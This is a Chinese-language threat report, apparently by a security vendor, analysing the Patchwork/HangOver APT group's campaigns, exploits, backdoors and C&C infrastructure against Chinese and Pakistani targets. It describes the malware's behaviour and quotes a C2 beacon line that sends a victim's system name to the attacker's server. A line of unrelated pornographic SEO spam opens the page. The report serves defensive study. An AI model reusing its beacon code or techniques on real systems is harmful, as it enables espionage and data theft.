精品国产一级在线观看,国产成人综合久久精品亚洲,免费一级欧美大片在线观看

披露申明

本報告中出現的IOC（Indicators of Compromise，威脅指標），進一步包括涉及到相關攻擊事件的樣本文件MD5等哈希值、域名、IP、URL、郵箱等威脅情報信息，由于其相關信息的敏感性和特殊性，所以在本報告中暫不對外披露，在報告中呈現的相關內容（文字、圖片等）均通過打碼隱藏處理。

*若您對本報告的內容感興趣，需要了解報告相關細節或相關IOC，可與360追日團隊通過電子郵件進行聯系，另外我們目前只提供電子郵件聯系方式：[email protected]，敬請諒解！

一、 概述

摩訶草組織（APT-C-09），又稱HangOver、VICEROY TIGER、The Dropping Elephant、Patchwork，是一個來自于南亞地區的境外APT組織，該組織已持續活躍了7年。摩訶草組織最早由Norman安全公司于2013年曝光，隨后又有其他安全廠商持續追蹤并披露該組織的最新活動，但該組織并未由于相關攻擊行動曝光而停止對相關目標的攻擊，相反從2015年開始更加活躍。

摩訶草組織主要針對中國、巴基斯坦等亞洲地區國家進行網絡間諜活動，其中以竊取敏感信息為主。相關攻擊活動最早可以追溯到2009年11月，至今還非?；钴S。在針對中國地區的攻擊中，該組織主要針對政府機構、科研教育領域進行攻擊，其中以科研教育領域為主。

從2009年至今，該組織針對不同國家和領域至少發動了3波攻擊行動和1次疑似攻擊行動。整個攻擊過程使用了大量系統漏洞，其中至少包括一次0day漏洞攻擊；該組織所采用的惡意代碼非常繁雜。載荷投遞的方式相對傳統，主要是以魚叉郵件進行惡意代碼的傳播，另外部分行動會采用少量水坑方式進行攻擊；值得關注的是，在最近一次攻擊行動中，出現了基于即時通訊工具和社交網絡的惡意代碼投遞方式，進一步還會使用釣魚網站進行社會工程學攻擊。在攻擊目標的選擇上，該組織主要針對Windows系統進行攻擊，同時我們也發現了存在針對Mac OS X系統的攻擊，從2015年開始，甚至出現了針對Android OS移動設備的攻擊。

由于對摩訶草組織的攻擊行動不是第一次披露，通過針對相應TTPs（Tactics, Techniques and Procedures，戰術、技術與步驟）的分析，結合以往跟進或披露的各類APT組織或攻擊行動，我們認為大部分APT組織的相關攻擊活動是不會停歇的，即使被某些報告暫時披露，導致過去的手段失效，但是只要被攻擊目標存在價值，攻擊組織的行動依然持續；存在部分情況，攻擊已達到最初預期，攻擊組織選擇暫時的蟄伏，但最終的目的也都是為了下一次攻擊養精蓄銳，這也是APT本身特性之一。其次，APT組織是否會對一個目標發動攻擊，主要取決于被攻擊目標的價值，而不在于被攻擊目標本身的安全防護強弱程度，被攻擊目標本身的強弱只是決定了攻擊組織所需的成本，而大多數APT組織會為了達到其意圖，幾乎不計成本（具有國家背景的攻擊組織所投入的攻擊成本常常超出我們的想象）。

分析過去一年中發生的APT攻擊，我們還發現中國一直都是APT攻擊的主要受害國，其中相關攻擊組織主要關注科研教育、政府機構領域，以竊取數據為目的。這和中國目前所處的經濟與政治環境息息相關。同時，導致針對中國目標的攻擊頻頻得手，除了被攻擊目標本身防御措施薄弱以外，針對APT等高級威脅，被攻擊目標本身缺乏積極主動的響應，即使在報告披露之后，甚至得知成為受害者之后，依然無法引起相應的重視，導致對自身檢查和修復不足，常常舊傷未愈，又添新恨。

同時，中國網絡安全行業依然缺乏能力型廠商的生存空間，大量的建設還是圍繞過去的規劃思路進行，這就導致了防護措施與高級威脅之間的脫節，從而給APT攻擊造成了大量可乘之機。十三五規劃的第一年，只有我們真正從安全規劃上改變思路，積極引入能力型廠商，才能形成能力型安全廠商與客戶之間的協同聯動，打通監控發現到檢測防御的事件響應各個環節，形成良性的閉合循環。

二、 摩訶草組織的四次攻擊行動

摩訶草組織相關重點事件時間軸

注：

1、 圓形藍色里程碑：相關典型后門首次出現時間

2、 正方形里程碑：相關漏洞（CVE編號）首次出現時間

黑色：發起相關攻擊時，漏洞為已知漏洞

橙色：發起相關攻擊時，漏洞為0day漏洞

3、 菱形深灰色里程碑：載荷投遞首次出現的時間

四波攻擊行動

第一次攻擊行動：Norman安全公司于2013年曝光的Hangover組織，我們發現相關樣本最早可以追溯到2009年11月，該組織在2012年尤為活躍，相關惡意代碼和攻擊目標的數量有不斷增加。該攻擊主要針對巴基斯坦，也有針對中國的攻擊，但相關攻擊事件較少。除了針對windows操作系統的攻擊，在2012年針對Mac OS X操作系統的攻擊也出現了。在第一次攻擊行動中就已經開始利用漏洞進行攻擊，但暫時沒有發現該組織會利用0day漏洞。

第二次攻擊行動：摩訶草組織在2013年10月下旬開始針對巴基斯坦的一次集中攻擊，主要針對巴基斯坦情報機構或軍事相關目標。本次攻擊行動具有代表性的就是攻擊中采用了一次利用0day漏洞（CVE-2013-3906）的攻擊，該漏洞是針對微軟Office產品，隨后微軟發布的漏洞預警指出該漏洞主要和TIFF圖像解析有關。

第三次攻擊行動：第二次小范圍集中攻擊之后，2013年12月底至2014年初，開始了新一輪攻擊，相關目標主要還是針對巴基斯坦軍事領域相關目標，本次攻擊行動中除了C&C服務器等從網絡行為可以聯系上第一次攻擊行動以外，從惡意代碼本身代碼同源性已經很難關聯到第一次攻擊行動了。這主要是本次攻擊行動中的惡意代碼大部分是用Python編寫的腳本，然后使用PyInstaller 和 Py2Exe兩種方式進行打包。

第四次（疑似）攻擊行動：本次攻擊行動也安全廠商被稱為“Patchwork”或“The Dropping Elephant”，從2015年初開始持續至今的攻擊，其中從2015年8月開始至2016年6月攻擊非常頻繁。本次行動的攻擊目標主要是中國地區，期間使用了大量文檔型漏洞，以CVE-2014-4114使用最多。我們主要通過本次攻擊行動中C&C的SOA關聯到第一次攻擊行動中相關C&C歷史域名注冊人，由于SOA本身可以被DNS管理者修改，所以存在被刻意修改的可能性，但從我們的分析推斷來看這種可能性很低，另外結合相關行動意圖和幕后組織的發起方，我們更傾向本次攻擊行動屬于摩訶草組織的最新一次攻擊行動。在本報告后續章節的研究分析，會將本次攻擊行動作為摩訶草組織的第四次攻擊行動進行描述。

三、 中國受影響情況

本章主要基于摩訶草組織近期的第四次攻擊行動，另外會涉及少量第三次攻擊行動。進一步對相關攻擊行動所針對目標涉及的地域和行業進行相關統計分析，時間范圍選擇2015年7月1日至2016年6月30日。

1. 地域分布

國內用戶受影響情況（2015年7月-2016年6月）

國內受影響量排名前三的省市是：北京、廣東、福建，其中北京地區是主要攻擊目標，在西藏、寧夏和貴州這三個省市自治區暫未發現受影響的用戶。

注：本報告中用戶數量主要指追日團隊監控到的計算機終端的數量

2. 行業分布

主要針對的行業分布

與第一次攻擊行動類似，第四次攻擊行動在針對中國的攻擊中，科研教育領域依然是摩訶草組織重點針對的目標。

從第一次攻擊行動開始軍事領域一直是摩訶草組織關注的重點，期間主要是針對巴基斯坦地區，很少針對中國地區，但從2015年第三方和第四次攻擊行動的開始，這一趨勢逐漸改變，針對中國地區的軍事領域的相關攻擊不斷增加。

四、 載荷投遞

關于針對中國的APT攻擊中常使用的載荷投遞方式，和主流的載荷投遞方式的介紹，我們在《2015年中國高級持續性威脅（APT）研究報告》 第四章中也詳細介紹，讀者可以結合參看相關報告。

1. 魚叉郵件

魚叉郵件主要的類型

注：上圖中斜體字內容是摩訶草組織較少或從未使用的方式。

攜帶惡意附件

摩訶草組織最常用的是攜帶二進制格式的可執行惡意程序，相關惡意可執行程序多為“.exe”和“.scr”擴展名。惡意代碼文件圖標一般為偽裝文檔、圖片圖片，進一步一般這類可執行程序均進行壓縮，以壓縮包形態發送。壓縮包和包內惡意代碼文件名一般是針對目標進行精心構造的文件名，相關文件名一般與郵件主題、正文內容和惡意代碼釋放出的誘餌文檔內容相符。

另外還頻繁使用文檔型漏洞，文檔型漏洞文件主要作為郵件附件進行針對性投放。相關文檔漏洞主要是針對微軟Office系列，主要采用已知漏洞進行攻擊，另外也使用過0day漏洞。關于摩訶草組織所使用的漏洞我們在之后章節會有詳細介紹。

惡意網址

一般APT攻擊中魚叉郵件使用惡意網址（或惡意URL）相比攜帶惡意附件還是少很多。但是在摩訶草組織的第四次攻擊行動中則為主流的方法。

通常惡意網址會出現在郵件正文中（以超鏈接或非超鏈接形態出現），或郵件附件內容中。后面這種情況較少，一般都是在正文中出現。惡意網址最終指向的頁面一般分為幾種

：釣魚頁面、漏洞頁面（瀏覽器漏洞、文檔漏洞）和二進制可執行程序。釣魚頁面指的是不包含最終指向二進制可執行程序的惡意代碼（基本為腳本），一般是通過偽造的頁面信息，誘導目標將相關敏感信息（用戶名、密碼等）通過頁面竊取。

在摩訶草組織發動的攻擊行動中主要是惡意網址以超鏈接形態存在與郵件正文中，最終是指向一個文檔型漏洞文件，相關文檔型漏洞文件被放置在釣魚網站（攻擊者依照目標所關注的網站，進行偽造的惡意網站）。攻擊者采用這種載荷投遞的方式，可以有效地繞過以檢測郵件附件為主的防御體系。

2. 即時通訊工具

在APT攻擊中利用即時通訊工具進行載荷投遞的情況比較少，主要是由于基于即時通訊工具的攻擊成本遠大于使用郵件。關于使用郵件和即時通訊工具，我們進行了一個對比，具體如下表所示：

郵件和即時通訊工具相關對比

首先郵件一般是以辦公為主，而即時通訊工具（如：QQ，之后涉及到相關都以QQ為例）除了企業級產品，其他以個人用戶為主的產品通常都是以個人用途為主。

從上表中“獲得目標聯系方式難度”這項來看，電子郵箱地址，尤其是對外辦公聯系的地址一般都會公布在互聯網上，而QQ號碼，尤其是以個人名義的QQ號碼很少會公布。進一步攻擊者已經獲得目標QQ號，在“投放實施難度”，需要攻擊者具備這些條件：首先，在偵查跟蹤環節已經對目標積累了一定的了解，包括目標基本信息、關注的領域、興趣愛好等；之后，就是需要與目標建立起聯系，一般是攻擊者主動添加目標QQ號，或者是被動等待目標添加，無論是主動還是被動方式建立聯系，都需要大量社會工程學與目標之間進行交互。雖然成本較高，但一旦與目標之間建立起聯系，并且取得目標的信任，則之后攻擊的成功率會較高，而且時效性高。

基于部分客戶反饋提供的相關攻擊信息，我們發現摩訶草組織在第四次攻擊行動中，從2015年8月底持續到2016年6月，大量使用即時通訊工具（主要是騰訊的QQ聊天工具）向目標發送木馬文件和文檔型漏洞文件。其中主要以發送二進制可執行程序為主，這類程序主要偽造成MP4格式的視頻文件，下表示相關惡意文件的文件名：

部分誘餌文件名稱（偽裝MP4視頻文件）

我們發現同一個惡意誘餌文件還會針對不同的目標進行多次投放，進一步我們也觀測到同一目標在短期內也會被不同的木馬連續攻擊，如下圖所示，所使用的木馬類型都屬于同類不同的變種，我們推測出現這種情況是由于攻擊者對目標失去控制權限后，進一步重新獲得權限，這也能看出目標的重要程度。

針對同一目標的三次攻擊（基于即時通訊工具）

3. 社交網絡

本月初我們披露了一起名為人面獅（APT-C-15） 的攻擊行動，此次行動是活躍在中東地區的網絡間諜活動。期間我們介紹了利用社交網絡（Facebook）進行水坑攻擊的事例。利用社交網絡進行載荷投遞的攻擊方式并不常見，在摩訶草組織的攻擊行動中也采用了類似方式。從2015年3月開始我們就陸續觀察到利用社交網絡（國內某社交網站）進行載荷投遞，但其頻次是遠低于利用魚叉郵件和即時通訊工具。下圖是攻擊者所關注的兩個目標頁面。

目標社交網絡帳號頁面1

目標社交網絡帳號頁面2

利用社交網絡進行載荷投遞一般是分為：SNS蠕蟲、放置二進制格式可執行惡意程序或文檔型漏洞文件，利用SNS蠕蟲比較少見，主要是需要依賴第三方社交網絡平臺自身漏洞，這對攻擊成本有較高要求。最常見的就是放置二進制可執行程序或文檔型漏洞文件，一般是放置文件或惡意鏈接地址，具體投遞可能會直接給目標用戶留言、發信息等，或者放置到目標所關注的其他社交賬號的頁面上，后者就是人面獅基于Facebook進行水坑攻擊的方式。

4. 水坑攻擊

APT攻擊中主流的水坑攻擊主要分為以下兩種：

第一種：被攻擊目標關注A網站，攻擊者將A網站攻陷，并植入惡意代碼（一般為漏洞腳本文件，俗稱掛馬），當目標訪問被攻陷的A網站并瀏覽相關頁面時，當目標環境相關應用觸發漏洞則有可能被植入惡意代碼。

第二種：被攻擊目標關注A網站，攻擊者將A網站攻陷，并將A網站上一些可信應用或鏈接替換為攻擊者所持有的惡意下載鏈接，當目標訪問被攻陷的A網站并將惡意下載鏈接的文件下載并執行，則被植入惡意代碼。這種攻擊的典型案例是2014年公開Havex木馬 ，也被稱作蜻蜓（Dragonfly）和活力熊（Energetic Bear）和我們在2015年5月末發布的海蓮花（OceanLotus）APT組織 。

這兩種水坑攻擊的共性是攻擊者需要獲得被攻擊目標所關注網站的修改權限。在摩訶草組織的相關攻擊行動中，幾乎很少采用以上者兩種“標準”的水坑攻擊。期間類似水坑攻擊，如魚叉郵件正文中嵌入惡意網址（釣魚網站）或基于社交網絡的攻擊。

另外在Norman安全公司于2013年曝光的Hangover報告中，披露的利用Internet Explorer漏洞（CVE-2012-4792）和Java漏洞（CVE-2012-0422），這兩個漏洞主要出現在水坑攻擊中。

五、 釣魚網站

1. 攻擊描述

摩訶草組織除了對目標用戶進行基于二進制可執行程序的攻擊以外，還會對目標用戶進行傳統的釣魚網站攻擊。

釣魚網站一般偽裝成網易郵箱網站，誘騙用戶在釣魚頁面輸入用戶名和密碼，來達到竊取目標用戶賬號信息的目的。這種方法沒有利用一般的二進制木馬或漏洞程序，而是完全通過社會工程學的方法進行攻擊。

相關釣魚網站還是通過載荷投遞中的魚叉郵件（惡意網址）、即時通訊工具、社交網絡等方法進行定向傳播。

相關釣魚網站列表

攻擊者對網易郵箱網站頁面進行了完全的拷貝復制，以此來達到以假亂真，最終只是在登錄驗證的環節進行了替換，將原有地址替換為指向攻擊者所持有的這個IP：**.***.**.242。

釣魚網站回傳目標用戶賬號信息源碼

2. 典型案例

案例1：*******web.com

釣魚頁面1

釣魚頁面1（源碼）

案例2：*******ina.info

釣魚頁面2

釣魚頁面2（源碼）

六、 漏洞利用

1. 0day漏洞（CVE-2013-3906）

背景

在第二次攻擊行動中，針對巴基斯坦的攻擊摩訶草組織使用了該漏洞，該漏洞在當時還是0day漏洞，從捕獲的攻擊事件來看最早使用該漏洞是在2013年10月23日，直到11月5日才有相關安全機構發布研究報告，微軟給出安全公告。這也直接證明了該組織是具備持有0day漏洞的能力。該漏洞在其他APT組織中也使用廣泛，如APT-C-05、APT-C-06、APT-C-17 等組織都使用過該漏洞，但使用時已經不是0day了。

漏洞相關基本信息

分析

CVE-2013-3906是ogl.dll模塊中在處理TIFF文件時存在一個整數溢出漏洞，精心構造數據會導致代碼分配一塊大小為0的內存，卻像其中寫入01484大小的數據，最終導致覆蓋堆中對象虛表，結合ActiveX控件進行堆噴射攻擊，完成最終利用。

往大小為0的堆拷貝數據

調用棧

拷貝源數據

拷貝源數據對于樣本中的內容

拷貝目的地堆內存大小為0

拷貝源數據堆內存大小01484

2. 已知漏洞

摩訶草組織發動的每次攻擊行動中都會頻繁的使用漏洞進行攻擊，其中大多數情況還是使用已知漏洞（或稱1day或Nday漏洞），也就是受影響廠商已經知道相關漏洞并發布更新補丁或者新版本產品代替。

在相關攻擊行動中，該組織更傾向使用文檔型漏洞，這往往需要和載荷投遞方式進行配合。另外也會涉及到瀏覽器等適合水坑攻擊的漏洞，我們在“第四章載荷投遞”中就曾提及Internet Explorer漏洞（CVE-2012-4792）和Java漏洞（CVE-2012-0422）這兩個漏洞的利用。

以文檔型漏洞為主

下表是相關文檔型漏洞列表，主要針對Microsoft Word和PowerPoint。其中以CVE-2014-4114在第四次攻擊行動中使用最為頻繁。

相關漏洞列表

CVE-2014-4114

背景

CVE-2014-4114漏洞是iSIGHT公司 在2014年10月14日發布相關報告，報告其中提到一個0day漏洞（CVE-2014-4114）用于俄羅斯相關主要針對北約、歐盟、電信和能源相關領域的網絡間諜活動。微軟也是在10月14日發布相關安全公告。

而CVE-2014-6352是可以認為繞過CVE-2014-4114補丁的漏洞，微軟之前的修補方案首先在生成Inf和exe文件后添加MakeFileUnsafe調用，來設置文件Zone信息，這樣隨后在漏洞執行inf安裝時，會有一個安全提示。而CVE-2014-6352漏洞樣本拋棄了使用inf來安裝exe，轉而直接執行exe。因為xp以上系統可執行文件的右鍵菜單第二項是以管理員權限執行，這樣導致如果用戶關閉了uac會導致沒有任何安全提醒。所以微軟6352的補丁是在調用右鍵菜單添加一個安全提示彈窗。

分析

由于之前CVE-2014-4114和CVE-2014-6352主要內嵌在Microsoft Office 2007（open xml）格式文檔中使用。

Open Xml通過xml描述文檔構造，通過zip打包在一起，導致安全分析人員很容易提取出樣本中的惡意數據。本次樣本（**************************df4715）使用了傳統的office03（復合文檔格式）文件格式，并且通過構造特殊zlib數據來躲避多數安全軟件掃描和分析人員分析。

傳統的CVE-2014-4114樣本分析只需要使用zip解壓Microsoft Office 2007文檔后，查看pptembeddings目錄下內嵌文件即可知道樣本行為。

Microsoft Office 2007樣本內嵌惡意文件

而Microsoft Office 2003格式無法直接解壓縮，并且原來embeddings目錄下的文件會被zlib壓縮后以ExternalObjectStorage 結構保存在PowerPoint Document流中。

通常我們解析到ExOleObjStgCompressedAtom結構，調用zlib解壓其中數據即可得到原始的內嵌文件，而此樣本利用Office容錯能力嵌入了沒有zlib頭的zlib流導致大部分分析工具解壓識別，如我們使用oletools解析提示無效壓縮頭。

Oletools解壓pps內嵌zlib數據失敗

惡意樣本內嵌的zlib流

修正解壓問題后，最終拿到了內嵌文件，利用inf給內嵌的pe寫啟動達到最終目的。

惡意樣本內嵌的Inf文件

惡意樣本內嵌的PE文件

3. 誘餌文件

誘餌文件主要分為文檔、圖片和視頻，其中主要是文檔類，進一步相關內容主要涉及到政治、軍事等，另外還有一些色情相關內容。

視頻類

視頻類惡意文件圖標

偽裝視頻類文件的攻擊主要出現在基于即時通訊工具的這種載荷投遞的方式中。其他方式中很少見。

圖片類

誘餌圖片

文檔類

Word相關

誘餌文檔1（CVE-2015-1641）

誘餌文檔2（CVE-2012-0158）

誘餌文檔3（CVE-2014-1761）

PowerPoint相關

誘餌文檔4（CVE-2014-4114）

PDF類

誘餌文檔6（PDF）

七、 后門分析

摩訶草組織第一次攻擊行動中，針對Windows系統安裝植入環節的惡意代碼主要分為兩大類：Smackdown下載者和HangOver（或HangOve）后門。Smackdown下載者主要在第一階段實施，可能是由一個自稱“Yash”或“Yashu”的人開發編寫，HangOver后門主要應用在第二階段，主要作用是竊取敏感信息，其中以竊取指定文件擴展名的文件為主。

相關文件擴展名1（windows）

另外，在第一次攻擊行動中，就已經發現存在針對Mac OS X系統的攻擊了，家族名稱為OSX.Kumar，其主要功能還是竊取敏感數據信息，和HangOver后門目的類似。

從第三次攻擊行動開始到第四次攻擊行動，相關惡意代碼發生了較大的變化，其中出現了由Python、AutoIt、Go語言等開發的惡意代碼，在本章節我們會有詳細的介紹。

摩訶草組織主要針對PC（Windows、Mac OS X）進行攻擊，我們在2015年發現該組織開始針對移動設備（Android系統）進行攻擊，由于相關樣本信息的特殊性，本報告中暫不對Android版本的惡意代碼展開分析介紹。

1. Mac OS X

功能簡介

Trojan.Spy.OSX.Kumar.A

添加自身為開機自啟動，惡意代碼在FileBackup.ini中保存了一些變量信息，例如文件后綴名列表，搜索磁盤下為下列后綴名的文檔，壓縮成zip文檔后基于HTTP協議上傳。

相關文件擴展名2（Mac OS X）

該家族中各個樣本程序代碼大致，不同點在于上傳的URL不同，如下表所示：

相關URL列表

Trojan.Spy.OSX.Kumar.B

首先將自己復制到“/Users/%username%/%bundlename%.app”目錄下，執行“/bin/sh -c open -a /Users/%username%/%bundlename%.app”，通過修改“/Users/%username%/Library/Preferences/com.apple.loginitems.plist”實現開機自啟動。每20s獲取屏幕截圖保存在“$HOME/MacApp”中，命名規則為yy-MM-dd-HH:mm:ss.png，通過HTTP上傳到遠程服務器。

樣本證書時間戳和其他樣本信息

OSX.Kumar變種之間的關聯

OSX.Kumar.A和OSX.Kumar.B的作者簽名信息相同：“Developer ID Application：Rajinder Kumar”，兩者部分代碼相同，如下圖所示：

代碼對比圖

兩個版本惡意代碼共用C&C

從上表也可以看出兩者之間存在共用C&C服務器的情況，據上述分析我們認為相關惡意代碼應該為同一作者所開發，只是兩者在功能上不同，OSX.Kumar.A是上傳文件，OSX.Kumar.B獲取屏幕信息。

2. Python版本

概述

功能流程圖

樣本文件大多偽裝成“pps、doc、pub、pdf、jpg”等類型的文件誘導用戶點擊，樣本程序大多是自解壓文件點擊后在打開正常文件的同時可以釋放并運行惡意程序。惡意的文件主要用python編寫的腳本然后使用PyInstaller 和 Py2Exe兩種方式進行打包。

自解壓樣本1

功能介紹

Python相關的exe文件主要通過PyInstaller和 Py2Exe兩種打包方式將python腳本打包成exe程序的,每一個打包成的exe都是一個功能模塊，主要功能有三類，此外還有一個非python的程序。

模塊A（CxsSvce.exe,send.exe）

調用系統工具systeminfo.exe檢測虛擬機，上傳指定目錄下的文件到服務器，從服務器下載文件并執行

相關代碼截圖1（模塊A）

模塊B（reg.exe，reg1.exe）

這個模塊并不是python的而是用MINGW32 C++編寫的，主要功能就是修改注冊表添加啟動項。

相關代碼截圖2（模塊B）

模塊C（winrm.exe，stisvc.exe）

主要功能就是偷竊文件，格式主要有：“doc, xls, ppt, pps, inp, pdf, xlsx, docx, pptx”

相關代碼截圖3（模塊C）

模塊D（sppsvc.exe，key.exe）

這是一個以鍵盤記錄器，hook了鍵盤和鼠標時間，記錄鍵盤操作到日志文件中。

相關代碼截圖4（模塊D）

3. 2016 AutoIT（Indetectables RAT）

執行流程

2016 AutoIT執行流程

基于第三方已公開方法

基于第三方已公開工具、源碼等

相關第三方已公開工具、源碼參考鏈接

相關第三方已公開工具、源碼參考鏈接

具體功能分析

惡意代碼使用AutoIt腳本編譯成的exe來執行功能，其中核心代碼抄襲自一款叫Indetectables RAT的遠程控制軟件。

主要的庫函數全部來自引用，程序使用了現成的AutoIt庫函數來直接組織程序功能。

庫函數引用表

程序主要過程中的功能通過使用上述庫函數實現，其中部分函數抄襲自Indetectables RAT

功能函數表

C&C功能說明

4. Go語言

樣本使用GO語言編寫，功能為從C&C下載SHELLCODE，解密后為PE，在內存中加載并執行。C&C地址為***.***.***.172，端口為8443。

每次下載的內容不相同，但是解密后的PE相同，解密時的大小有錯誤，需要patch后才能繼續執行。但是進入OEP依然有錯誤，代碼為0且不可執行。

5. FakeJLI

基本信息

FakeJLI是第四次攻擊行動中近期很活躍的一個家族，通過樣本時間戳來看在2016年6月已經出現。

當初始樣本被點擊打開以后，首先會釋放各種組件到%temp%目錄，然后觸發CVE-2014-4114漏洞，將釋放在%temp%目錄的組件之一的sysvolinfo.exe文件運行起來，sysvolinfo.exe該文件名曾多次在AutoIt樣本中出現。

通過分析sysvolinfo.exe是用IExpress打包成的自解壓安裝程序（類似于NSIS），通過解包在%temp%目錄下釋放MICROS~1.EXE，jij.dll及Msvcr71.dll三個文件。其中Msvcrt71.dll為正常文件，為VC7.0運行庫，之后執行MICROS~1.EXE，安裝包的標題信息為merged1234。

相關基本信息

行為隱藏和安全檢測繞過

MICROS~1.EXE簽名信息

MICROS~1.EXE是Java的一個組件，帶有正常的簽名信息。Jil.dll 是真正的惡意程序，Micros~1.EXE默認會加載這兩個動態庫。MICROS~.EXE在main函數中會直接調用jil.dll的導出函數JLI_MemAlloc()，而沒有經過任何的校驗，從而導致惡意代碼被執行起來。Msvcrt71.dll為正常文件，為VC7.0運行庫，釋放它的目的是為了使樣本能正常運行。

jij.dll中所有的導出函數都被重定向到了惡意代碼開始的地方

MICROS~1.EXE 是正常的帶簽名Java組件，原本其調用的Jli.dll原本也應該是正常的Java組件，現在被替換成帶毒的Dll（導出函數名不變，但是函數是病毒函數），即通過帶簽名的可信程序去加載偽裝成正常組件的病毒Dll，也算是一種Dll劫持。利用這種方法可以繞過殺軟的主動防策略，從而可以執行真正惡意代碼，是一種比較常見的繞過現有病毒查殺體系的方法。

具體功能分析

功能簡述

隱藏掉自身的窗口以防止被察覺到。

設置自身為自啟動。

載入其他模塊，并動態加載，或者創建子進程。

當有U盤插入的時候遍歷目錄，搜索各種文檔（主要包括：“pdf、doc、docx、ppt、pptx、txt”），并寫入文件，上傳到遠程服務器。

連接跳板鏈接獲取真正C&C地址。

與遠程C&C服務器通信接收執行命令，收集各種信息，包括：用戶名、電腦名用戶、樣本版本信息等上傳。

反彈Shell，執行命令。

C&C地址的獲取

惡意代碼在獲取C&C地址的時候，方法比較特殊，相關C&C地址并未預留在惡意代碼本身，而是存放在第三方可信網站中。

進一步主要是兩種方式：

基于第三方論壇博客：攻擊者會選擇在論壇回復發帖留言，將C&C地址預留在帖子內容中，進一步通過不斷修改已發帖的內容來達到更改C&C信息的目的。

入侵可信網站：攻擊者事先會將正?？尚啪W站攻陷后，將相關C&C地址預留在指定頁面。

回復帖中預留的相關C&C地址信息

解密后相關真實C&C地址如下：

hxxp://***.***.***.173/yumhong/ghsnls.php

另外關于本小節的內容，在本報告的“C&C分析”章節會有進一步詳細描述，具體請參看相關章節內容。

八、 C&C分析

1. Whois隱私保護

Whois隱私保護是指域名注冊服務商為域名注冊者提供的一種服務，即域名WHOIS信息會隱藏域名注冊者的真實信息，如電子郵件地址、電話號碼等，一般這種服務為收費有償服務。

在APT攻擊中，相關組織非常喜歡采用whois隱私保護這種方式來隱藏自己的真實身份，安全研究機構或人員很難找到相關線索信息進行關聯回溯。下圖是我們就第一次攻擊行動和第四次攻擊行動中是否采用whois隱私保護進行的統計分析。

左圖（第一次攻擊）、右圖（第四次攻擊）

上圖分別是兩次攻擊行動中C&C域名的保護情況（目前的狀態，如果相關域名現在被sinkhole狀態，則以歷史存在whois隱私保護來計算），整體來看第四次攻擊行動基本都采用了whois隱私保護，大部分從域名注冊后的第二天就開始進行whois隱私保護。而第一次攻擊行動中，尤其是2011年初期注冊的域名，很多是未進行whois隱私保護，如下表所示，在2011年未進行保護，在2012年就開始進行whois隱私保護來進行彌補。

第一次攻擊行動相關C&C信息（WHOIS信息）

2. 域名注冊時間分布

左圖（第一次攻擊）、右圖（第四次攻擊）

上圖分別是兩次攻擊行動中C&C域名注冊時間的分布情況，第一次攻擊行動主要分布在2011和2012年，相關攻擊活躍的時間主要是2012年，而在第四次攻擊中主要是2014和2015年，其相關攻擊主要活躍的時間是2015年和2016年。

由此也可以推斷在最新第四次攻擊中，摩訶草組織有計劃的提前半年到一年左右就將相關域名資源規劃好了。

3. C&C對應IP地理位置分布

（第一次攻擊）、右圖（第四次攻擊）

可以看出第一次攻擊行動和第四次攻擊行動所使用的IP地理位置還是有很多共性的。排除第一次行動中的英國和第四次攻擊中的德國，其使用比例比較接近。

4. 基于第三方可信網站中轉

概述

在“后門分析”章節中我們對FakeJLI家族進行了分析，并發現了其他特殊的獲取C&C地址的方式。

進一步主要是兩種方式：

基于第三方論壇博客：攻擊者會選擇在論壇回復發帖留言，將C&C地址預留在帖子內容中，進一步通過不斷修改已發帖的內容來達到更改C&C信息的目的。

入侵可信網站：攻擊者事先會將正?？尚啪W站攻陷后，將相關C&C地址預留在指定頁面。

相關被利用第三方可信網站鏈接

惡意代碼首先會從論壇帖子中尋找相關C&C地址，如果沒有則會嘗試從被入侵網站中尋找相關C&C地址。被作為中轉的論壇都是國內大型論壇，攻擊者通過回復正常提問帖子來隱藏C& C信息。

相關案例

某大型論壇1

某大型論壇1相關用戶信息

相關回帖信息

如上圖所示，該域名信息在3月20日發布，最近的一次修改是4月6號，可知作者通過修改帖子來不斷更新C&C信息。

某大型論壇2

某大型論壇2相關用戶信息

相關回帖信息

C&C信息同樣是3月19發布，4月6號修改。另外攻擊者在論壇中提及發郵件給了*********[email protected]，不知道是否對相關郵箱進行了攻擊。

某大型論壇3

某大型論壇3相關用戶信息

相關回帖信息

用戶注冊日期是3月14日，最近回復也是3月14日。

九、 關聯分析

本章主要就摩訶草組織的四次攻擊行動之間的聯系進行關聯分析，進一步主要從相關攻擊中所使用的惡意代碼、C&C服務器等技術層面的分析。

從這四次行動的攻擊意圖和背景分析來看，應該都是來自于同一國家，且攻擊目標基本一致。

1. 第一次攻擊行動中Windows和Mac OS X

共用C&C

OSX.Kumar.A基本信息

OSX.Kumar.A樣本代碼截圖（C&C地址）

Hangover樣本基本信息

Hangover樣本代碼截圖（C&C地址）

特殊字符串

對比OSX.Kumar.A樣本和已知Hangover樣本的分析結果，可以看出*********zone.net是共用C&C。進一步OSX.Kumar.A請求的URL如下：

*********one.net/yash/upload.php

另外我們可以看到Kumar樣本請求的URL中的目錄名稱和Hangover樣本PDB路徑中的用戶名相同。相關部分PDB路徑如下表所示：

Hangover相關樣本PDB路徑

2. 第一次和第二次攻擊行動

相關樣本基本信息

從上表是第一次和第二次攻擊行動相關樣本的基本信息，從編譯時間、C&C，以及URL形態暫時看不出有較強的關聯。

兩者之間相同信息

上表是兩次攻擊行動中樣本的相同信息，其中User-Agent都是“WinInetGet/0.1”，進一步兩者都屬于downloader，作用為通過HTTP連接C&C，下載payload并執行，然后將執行結果通過res參數上報C&C，成功為sucessfully（拼寫錯誤），失敗為failed。下表示兩者之間網絡函數的差別。

兩者之間網絡函數的區別

3. 第一次和第三次攻擊行動

共用C&C

第一次和第三次攻擊行動中的后門程序都使用了相同的C&C服務器，如下：

共用的C&C列表

相似的通信控制

第三次攻擊行動中也有部分AutoIT惡意程序，AutoIT惡意程序請求的HTTP是“http://server/folder/online.php?sysname=”，這個格式（dfiles5 = urlopen(“http://”+ getserver + foldername+ “/online.php?sysname=”+cname+”")）在Hangover攻擊案例中的被多次用到，所以說兩者的網絡構建是關聯的，進一步用于控制惡意程序的后端構架也是一樣的。

4. 第一次和第四次攻擊行動

相同的郵箱地址

第四次攻擊行動相關C&C信息（SOA信息）

對照上表和下表的內容，我們可以看到第四次攻擊中C&C SOA的管理者郵箱地址與第一次攻擊中C&C的域名注冊郵箱一致，都是“*********[email protected]”，上表中所有C&C從注冊第二天開始就采用whois隱私保護，從下表我們也能推測出攻擊者基本是在2012年注意到域名注冊郵箱會暴露相關信息，而統一更換為whois隱私保護策略，但由于有相關歷史WHOIS記錄，所以我們還是發現了相關蛛絲馬跡。

